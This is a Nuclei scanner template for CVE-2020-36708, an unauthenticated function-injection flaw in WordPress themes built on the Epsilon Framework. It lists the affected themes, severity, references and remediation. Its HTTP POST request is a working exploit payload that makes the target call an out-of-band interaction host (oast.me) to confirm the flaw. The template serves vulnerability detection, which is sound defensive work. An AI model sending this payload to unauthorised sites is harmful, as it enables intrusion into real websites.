id: CVE-2020-36708

info:
  name: WordPress Epsilon Framework Themes <=2.4.8 - Remote Code Execution
  author: madrobot
  severity: critical
  description: |
    WordPress themes including Shapely <= 1.2.7, NewsMag <= 2.4.1, Activello <= 1.4.0, Illdy <= 2.1.4, Allegiant <= 1.2.2, Newspaper X <= 1.3.1, Pixova Lite <= 2.0.5, Brilliance <= 1.2.7, MedZone Lite <= 1.2.4, Regina Lite <= 2.0.4, Transcend <= 1.1.8, Affluent <= 1.1.0, Bonkers <= 1.0.4, Antreas <= 1.0.2, Sparkling <= 2.4.8, and NatureMag Lite <= 1.0.4 contain a function injection caused by epsilon_framework_ajax_action, letting unauthenticated attackers call functions and achieve remote code execution, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary code remotely, leading to full site compromise.
  remediation: |
    Update themes to the latest versions where the vulnerability is fixed or apply security patches provided by theme developers.
  reference:
    - https://www.exploit-db.com/exploits/49327
    - https://wpscan.com/vulnerability/10417
    - https://wpscan.com/vulnerability/bec52a5b-c892-4763-a962-05da7100eca5
    - https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-framework-themes/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b75c322-539d-44e9-8f26-5ff929874b67?source=cve
    - https://blog.nintechnet.com/unauthenticated-function-injection-vulnerability-fixed-in-15-wordpress-themes/
    - https://blog.nintechnet.com/unauthenticated-function-injection-vulnerability-in-wordpress-sparkling-theme/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-36708
    cwe-id: CWE-94
    epss-score: 0.65342
    epss-percentile: 0.99155
    cpe: cpe:2.3:a:colorlib:activello:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: colorlib
    product: activello
    kev: true
    vkev: true
  tags: wordpress,rce,cve,cve2020,edb,wpscan,vkev,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=https://oast.me/

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Interactsh Server"
          - "protocol_version"

      - type: status
        status:
          - 200
# digest: 490a00463044022047c65ff9b03c02a9b0700f66d97a43761801e03916b6bfdb49d60b77bbe1397802200161d90fbe2b7289624403722c63195d079c4bd2e42d2e40be1a01c3f5f67263:922c64590222798bb761d5b6d8e72950